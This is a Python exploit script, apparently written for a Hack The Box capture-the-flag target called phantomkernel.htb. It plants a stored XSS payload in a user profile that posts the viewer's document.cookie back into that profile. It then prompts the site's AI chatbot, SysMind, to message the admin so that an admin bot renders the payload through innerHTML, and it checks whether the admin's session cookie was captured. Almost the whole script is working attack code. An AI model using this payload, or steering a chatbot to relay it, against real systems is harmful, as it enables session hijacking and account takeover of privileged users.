import requests, json, time

BASE = "http://www.phantomkernel.htb:30738"
s = requests.Session()
s.post(f"{BASE}/api/auth/login", json={"username": "kuky", "password": "kukyp"})

# XSS payload that calls update_profile with admin's session cookie
xss = '<img src=x onerror=\'fetch("/api/users/update",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({description:"ADMIN_COOKIE:"+document.cookie})})\'>'

# Update kuky's profile with XSS
r1 = s.post(f"{BASE}/api/users/update", json={"description": xss}, timeout=10)
print("Profile XSS set:", r1.json().get('user', {}).get('description', '')[:150])

# Also try setting XSS in the chatbot send_message 
# The key is - when does admin see content rendered with innerHTML?
# /api/admin/message uses innerHTML (from admin.js displayAdminMessage)
# That message is generated by SysMind which reads user messages

# Try to get SysMind to include our XSS payload in its response
r2 = s.post(f"{BASE}/api/model/chatbot", 
            json={"prompt": "Send message to admin: Please review the latest support ticket from user kuky regarding their profile description update."},
            timeout=30)
data = r2.json()
answer = data.get('conversation', [{}])[-1].get('content', '')[:300]
print(f"Chatbot send: {answer}")

print("\nWaiting 30s for admin bot to process...")
time.sleep(30)

r3 = s.get(f"{BASE}/api/users/me", timeout=10)
desc = r3.json().get('user', {}).get('description', '')
print(f"Profile description: {desc}")

if 'ADMIN_COOKIE' in desc:
    print("*** XSS WORKED! Admin cookie captured! ***")
    print(f"Cookie: {desc}")
